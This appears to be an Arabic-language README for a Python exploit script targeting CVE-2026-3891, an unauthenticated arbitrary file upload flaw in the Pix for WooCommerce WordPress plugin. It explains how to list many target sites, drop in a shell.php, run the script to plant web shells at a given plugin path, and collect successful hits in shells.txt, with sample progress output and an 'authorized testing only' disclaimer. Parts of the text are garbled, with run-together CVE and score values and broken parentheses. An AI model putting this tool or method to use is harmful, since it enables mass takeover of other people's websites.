
Pix for WooCommerce <= 1.5.0 - رفع ملفات تعسفي بدون مصادقة
Pix for WooCommerce <= 1.5.0 - رفع ملفات تعسفي بدون مصادقة
إضافة Pix for WooCommerce لووردبريس معرّضة لثغرة رفع ملفات تعسفي بدون مصادقة بسبب:
في الدالة lkn_pix_for_woocommerce_c6_save_settings في جميع الإصدارات حتى 1.5.0 وما يشملها.
هذا يتيح للمهاجمين غير المصادق عليهم عن بُعد رفع ملفات تعسفية، مما يؤدي إلى تنفيذ كود عن بُعد (RCE).
CVE-2026-38919.8 (حرجة)CVE-2026-3891.py@Kxploitpip install requests rich
أنشئ ملفًا:
list.txt
مثال:
http://example.com
https://target.com
victim-site.com
إذا كان البروتوكول مفقودًا → السكربت يضيف
http://تلقائيًا
ضع ملف الـ shell الخاص بك في نفس المجلد:
shell.php
python3 CVE-2026-3891.py
سيطلب السكربت:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
هذا المشروع مقدم لأغراض تعليمية وللاختبارات الأمنية المصرح بها فقط.
Nxploited